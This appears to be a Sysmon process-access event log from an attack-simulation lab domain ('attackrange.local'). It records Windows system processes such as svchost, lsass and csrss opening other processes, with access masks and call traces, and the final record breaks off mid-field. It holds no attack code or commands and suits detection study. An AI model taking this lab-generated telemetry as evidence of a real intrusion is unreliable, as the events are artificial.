{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.768\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001053410100}\r\nTargetProcessId: 2144\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.768","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001053410100}","TargetProcessId":"2144","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.877\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.877","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 